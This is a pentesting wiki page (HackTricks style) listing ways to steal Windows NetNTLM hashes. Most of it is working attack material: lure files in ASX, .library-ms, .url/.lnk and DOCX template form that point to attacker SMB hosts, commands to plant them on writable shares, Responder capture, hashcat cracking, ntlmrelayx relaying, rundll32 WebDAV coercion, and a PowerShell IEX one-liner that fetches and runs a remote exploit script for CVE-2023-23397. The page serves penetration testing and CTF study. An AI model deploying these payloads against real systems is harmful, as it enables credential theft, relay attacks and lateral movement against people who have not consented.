places-to-steal-ntlm-creds.md (12897B)
1 --- 2 title: "Places to steal NTLM creds" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Places to steal NTLM creds 14 15 **Check all the great ideas from [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) from the download of a microsoft word file online to the ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md and [https://github.com/p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)**<sup>[[12]](#references)[[13]](#references)[[14]](#references)</sup> 16 17 ### Writable SMB share + Explorer-triggered UNC lures (ntlm_theft/SCF/LNK/library-ms/desktop.ini) 18 19 If you can **write to a share that users or scheduled jobs browse in Explorer**, drop files whose metadata points to your UNC (e.g. `\\ATTACKER\share`). Rendering the folder triggers **implicit SMB authentication** and leaks a **NetNTLMv2** to your listener.<sup>[[1]](#references)</sup> 20 21 1. **Generate lures** (covers SCF/URL/LNK/library-ms/desktop.ini/Office/RTF/etc.) 22 23 ```bash 24 git clone https://github.com/Greenwolf/ntlm_theft && cd ntlm_theft 25 uv add --script ntlm_theft.py xlsxwriter 26 uv run ntlm_theft.py -g all -s <attacker_ip> -f lure 27 ``` 28 29 2. **Drop them on the writable share** (any folder the victim opens): 30 31 ```bash 32 smbclient //victim/share -U 'guest%' 33 cd transfer\ 34 prompt off 35 mput lure/* 36 ``` 37 38 3. **Listen and crack**: 39 40 ```bash 41 sudo responder -I <iface> # capture NetNTLMv2 42 hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt # autodetects mode 5600 43 ``` 44 45 Windows may hit several files at once; anything Explorer previews (`BROWSE TO FOLDER`) requires no clicks. 46 47 ### Windows Media Player playlists (.ASX/.WAX) 48 49 If you can get a target to open or preview a Windows Media Player playlist you control, you can leak Net‑NTLMv2 by pointing the entry to a UNC path. WMP will attempt to fetch the referenced media over SMB and will authenticate implicitly.<sup>[[3]](#references)[[4]](#references)</sup> 50 51 Example payload: 52 53 ```xml 54 <asx version="3.0"> 55 <title>Leak</title> 56 <entry> 57 <title></title> 58 <ref href="file://ATTACKER_IP\\share\\track.mp3" /> 59 </entry> 60 </asx> 61 ``` 62 63 Collection and cracking flow: 64 65 ```bash 66 # Capture the authentication 67 sudo Responder -I <iface> 68 69 # Crack the captured NetNTLMv2 70 hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt 71 ``` 72 73 ### ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055) 74 75 Windows Explorer insecurely handles .library-ms files when they are opened directly from within a ZIP archive. If the library definition points to a remote UNC path (e.g., \\attacker\share), simply browsing/launching the .library-ms inside the ZIP causes Explorer to enumerate the UNC and emit NTLM authentication to the attacker. This yields a NetNTLMv2 that can be cracked offline or potentially relayed.<sup>[[2]](#references)</sup> 76 77 Minimal .library-ms pointing to an attacker UNC 78 79 ```xml 80 <?xml version="1.0" encoding="UTF-8"?> 81 <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> 82 <version>6</version> 83 <name>Company Documents</name> 84 <isLibraryPinned>false</isLibraryPinned> 85 <iconReference>shell32.dll,-235</iconReference> 86 <templateInfo> 87 <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> 88 </templateInfo> 89 <searchConnectorDescriptionList> 90 <searchConnectorDescription> 91 <simpleLocation> 92 <url>\\10.10.14.2\share</url> 93 </simpleLocation> 94 </searchConnectorDescription> 95 </searchConnectorDescriptionList> 96 </libraryDescription> 97 ``` 98 99 Operational steps 100 - Create the .library-ms file with the XML above (set your IP/hostname). 101 - Zip it (on Windows: Send to → Compressed (zipped) folder) and deliver the ZIP to the target. 102 - Run an NTLM capture listener and wait for the victim to open the .library-ms from inside the ZIP. 103 104 105 ### Outlook calendar reminder sound path (CVE-2023-23397) – zero‑click Net‑NTLMv2 leak 106 107 Microsoft Outlook for Windows processed the extended MAPI property PidLidReminderFileParameter in calendar items. If that property points to a UNC path (e.g., \\attacker\share\alert.wav), Outlook would contact the SMB share when the reminder fires, leaking the user’s Net‑NTLMv2 without any click. This was patched on March 14, 2023, but it’s still highly relevant for legacy/untouched fleets and for historical incident response.<sup>[[5]](#references)</sup> 108 109 Quick exploitation with PowerShell (Outlook COM): 110 111 ```powershell 112 # Run on a host with Outlook installed and a configured mailbox 113 IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1) 114 Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept" 115 # Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav 116 ``` 117 118 Listener side: 119 120 ```bash 121 sudo responder -I eth0 # or impacket-smbserver to observe connections 122 ``` 123 124 Notes 125 - A victim only needs Outlook for Windows running when the reminder triggers. 126 - The leak yields Net‑NTLMv2 suitable for offline cracking or relay (not pass‑the‑hash). 127 128 129 ### .LNK/.URL icon-based zero‑click NTLM leak (CVE‑2025‑50154 – bypass of CVE‑2025‑24054) 130 131 Windows Explorer renders shortcut icons automatically. Recent research showed that even after Microsoft’s April 2025 patch for UNC‑icon shortcuts, it was still possible to trigger NTLM authentication with no clicks by hosting the shortcut target on a UNC path and keeping the icon local (patch bypass assigned CVE‑2025‑50154). Merely viewing the folder causes Explorer to retrieve metadata from the remote target, emitting NTLM to the attacker SMB server.<sup>[[6]](#references)</sup> 132 133 Minimal Internet Shortcut payload (.url): 134 135 ```ini 136 [InternetShortcut] 137 URL=http://intranet 138 IconFile=\\10.10.14.2\share\icon.ico 139 IconIndex=0 140 ``` 141 142 Program Shortcut payload (.lnk) via PowerShell: 143 144 ```powershell 145 $lnk = "$env:USERPROFILE\Desktop\lab.lnk" 146 $w = New-Object -ComObject WScript.Shell 147 $sc = $w.CreateShortcut($lnk) 148 $sc.TargetPath = "\\10.10.14.2\share\payload.exe" # remote UNC target 149 $sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks 150 $sc.Save() 151 ``` 152 153 Delivery ideas 154 - Drop the shortcut in a ZIP and get the victim to browse it. 155 - Place the shortcut on a writable share the victim will open. 156 - Combine with other lure files in the same folder so Explorer previews the items. 157 158 ### No-click .LNK NTLM leak via ExtraData icon path (CVE‑2026‑25185) 159 160 Windows loads `.lnk` metadata during **view/preview** (icon rendering), not only on execution. CVE‑2026‑25185 shows a parsing path where **ExtraData** blocks cause the shell to resolve an icon path and touch the filesystem **during load**, emitting outbound NTLM when the path is remote. 161 162 Key trigger conditions (observed in `CShellLink::_LoadFromStream`): 163 - Include **DARWIN_PROPS** (`0xa0000006`) in ExtraData (gate to icon update routine). 164 - Include **ICON_ENVIRONMENT_PROPS** (`0xa0000007`) with **TargetUnicode** populated. 165 - The loader expands environment variables in `TargetUnicode` and calls `PathFileExistsW` on the resulting path. 166 167 If `TargetUnicode` resolves to a UNC path (e.g., `\\attacker\share\icon.ico`), **merely viewing a folder** containing the shortcut causes outbound authentication. The same load path can also be hit by **indexing** and **AV scanning**, making it a practical no‑click leak surface.<sup>[[7]](#references)</sup> 168 169 Research tooling (parser/generator/UI) is available in the **LnkMeMaybe** project to build/inspect these structures without using the Windows GUI.<sup>[[8]](#references)</sup> 170 171 172 ### WebDAV auth coercion / credential validation via `davclnt.dll,DavSetCookie` 173 174 The native **WebDAV client** can be abused to force the current logon session to authenticate to an arbitrary **HTTP/WebDAV** endpoint: 175 176 ```batch 177 rundll32.exe davclnt.dll,DavSetCookie <HOST> http://<TARGET>/C$/Windows 178 ``` 179 180 Why this is useful: 181 - Against an **attacker-controlled WebDAV server**, it can trigger **NTLM over HTTP** without dropping a custom client. 182 - Against **internal hosts**, it is a quiet way to **validate where stolen credentials are accepted** before moving laterally.<sup>[[9]](#references)</sup> 183 - The command is a good alternative when **SMB egress is filtered** but **HTTP/WebDAV** is still reachable. 184 185 Operational notes: 186 - The **WebClient** service must be running on the source host. 187 - `rundll32.exe` loads `davclnt.dll` and makes Windows handle the WebDAV authentication using the **current user's credentials**.<sup>[[10]](#references)</sup> 188 - If you point it to infrastructure you control, use an NTLM-aware HTTP listener/relay such as: 189 190 ```bash 191 # Capture or relay NTLM over HTTP/WebDAV 192 ntlmrelayx.py -t smb://<TARGET> --http-port 80 193 ``` 194 195 From a detection perspective, repeated `rundll32.exe davclnt.dll,DavSetCookie` executions against many internal systems are a strong signal of **credential validation / spray-like lateral movement prep** rather than normal user behaviour.<sup>[[9]](#references)[[11]](#references)</sup> 196 197 ### Office remote template injection (.docx/.dotm) to coerce NTLM 198 199 Office documents can reference an external template. If you set the attached template to a UNC path, opening the document will authenticate to SMB. 200 201 Minimal DOCX relationship changes (inside word/): 202 203 1) Edit word/settings.xml and add the attached template reference: 204 205 ```xml 206 <w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/> 207 ``` 208 209 2) Edit word/_rels/settings.xml.rels and point rId1337 to your UNC: 210 211 ```xml 212 <Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/> 213 ``` 214 215 3) Repack to .docx and deliver. Run your SMB capture listener and wait for the open. 216 217 For post-capture ideas on relaying or abusing NTLM, check: 218 219 [Readme](/hacktricks/windows-hardening/ntlm/overview) 220 221 222 ## References 223 - [1] [HTB: Breach – Writable share lures + Responder capture → NetNTLMv2 crack → Kerberoast svc_mssql](https://0xdf.gitlab.io/2026/02/10/htb-breach.html) 224 - [2] [HTB Fluffy – ZIP .library‑ms auth leak (CVE‑2025‑24071/24055) → GenericWrite → AD CS ESC16 to DA (0xdf)](https://0xdf.gitlab.io/2025/09/20/htb-fluffy.html) 225 - [3] [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html) 226 - [4] [Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft](https://www.morphisec.com/blog/5-ntlm-vulnerabilities-unpatched-privilege-escalation-threats-in-microsoft/) 227 - [5] [MSRC – Microsoft mitigates Outlook EoP (CVE‑2023‑23397) and explains the NTLM leak via PidLidReminderFileParameter](https://www.microsoft.com/en-us/msrc/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/) 228 - [6] [Cymulate – Zero‑click, one NTLM: Microsoft security patch bypass (CVE‑2025‑50154)](https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/) 229 - [7] [TrustedSec – LnkMeMaybe: A Review of CVE‑2026‑25185](https://trustedsec.com/blog/lnkmemaybe-a-review-of-cve-2026-25185) 230 - [8] [TrustedSec LnkMeMaybe tooling](https://github.com/trustedsec/LnkMeMaybe) 231 - [9] [Rapid7 – When IT Support Calls: Dissecting a ModeloRAT Campaign from Teams to Domain Compromise](https://www.rapid7.com/blog/post/tr-it-support-dissecting-modelorat-campaign-microsoft-teams-compromise) 232 - [10] [Microsoft Learn – davclnt.h header](https://learn.microsoft.com/en-us/windows/win32/api/davclnt/) 233 - [11] [Splunk – Windows Rundll32 WebDAV Request](https://research.splunk.com/endpoint/320099b7-7eb1-4153-a2b4-decb53267de2/) 234 - [12] [osandamalith.com - Places Of Interest In Stealing Netntlm Hashes](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes) 235 - [13] [soufianetahiri/TeamsNTLMLeak](https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md) 236 - [14] [p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)